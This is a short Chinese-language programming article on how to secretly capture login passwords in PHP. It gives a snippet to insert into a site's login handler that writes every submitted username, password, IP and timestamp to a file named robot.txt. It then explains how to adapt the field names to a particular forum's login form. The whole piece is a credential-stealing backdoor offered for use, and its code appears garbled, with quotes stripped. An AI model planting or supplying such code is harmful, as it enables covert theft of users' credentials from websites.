欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  IT编程

php截取后台登陆密码的代码

程序员文章站 2022-06-25 16:02:35
if($_post[loginsubmit]!=){ //判断是否点了登陆按钮 $sb=user:.$_post[username].--passwd:.$_post[pa...
if($_post[loginsubmit]!=){ //判断是否点了登陆按钮
$sb=user:.$_post[username].--passwd:.$_post[password].--ip:.$http_server_vars[remote_addr].--.date(y-m-d h:i:s).rn; // 把post接收到的值 连起来赋值给变量$sb
fwrite(fopen(robot.txt,ab),$sb);} //结果写入一个文件


下面简单分析一下,以华夏的登陆页面为例。打开bbs.xxx.com/login.php 右键查看源码,ctrl+f搜索action找到登陆的表单。

我只复制了关键代码过来.


<form action=login.php? method=post name=login onsubmit=this.submit.disabled=true;> //action后面的值即是表单提交的地址,里面会处理登陆,比如判断密码是不是正确什么的 method为post,所以用$_post接收。

。。。。强大的省略号。。。。。。

<tr>
<td height=40>账号(<u>u</u>):<br>
<input
class=input id=pwuser accesskey=u size=16
name=pwuser> </td></tr> //用户名的input输入框, 注意其name的值, 要和$_post[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_post[pwuser]

<tr>
<td height=40>密 码(<u>p</u>):<br><input
class=input id=pwpwd accesskey=p
type=password size=16 name=pwpwd> </td></tr> //用户名的input输入框, 注意其name的值, 要和$_post[username] 这里面的对应, 所以要截取华夏的密码,需要改为 $_post[pwpwd]